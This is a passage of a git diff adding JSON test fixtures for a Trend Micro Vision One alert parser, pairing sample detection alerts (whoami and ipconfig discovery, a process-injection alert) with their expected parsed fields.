[{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": 
[\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": 
\"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], 
\"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": 
\"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": 
\"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": 
[\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": 
\"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Potential Information Gathering",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-26T16:48:06Z",
+ "host": {
+ "id": "7b00c266-f17f-439f-bb94-3945d463a78b",
+ "ip": [
+ "10.0.0.6"
+ ],
+ "name": "windows10"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ",
+ "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe",
+ "hash": {
+ "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+ "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+ },
+ "parent": {
+ "command_line": "C:\\Windows\\Explorer.EXE",
+ "executable": "C:\\Windows\\explorer.exe",
+ "hash": {
+ "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753"
+ },
+ "pid": 9920
+ },
+ "pid": 5040
+ },
+ "related": {
+ "hash": [
+ "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753",
+ "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+ "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+ ],
+ "ip": [
+ "10.0.0.6"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Potential Information Gathering"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "investigation_status": "New",
+ "severity": "low",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "windows10",
+ "id": "windows10\\jdoe",
+ "name": "jdoe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index b31951fe2..5b8dbfc95 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
@@ -24,6 +24,7 @@
 "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe"
 },
 "host": {
+ "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F",
 "ip": [
 "1.2.3.4"
 ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 9c013b1c0..9a41ea92c 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json
@@ -24,6 +24,7 @@
 "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
 },
 "host": {
+ "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
 "ip": [
 "10.10.58.51"
 ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
new file mode 100644
index 000000000..dbeed8e8e
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": 
\"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": 
[\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": 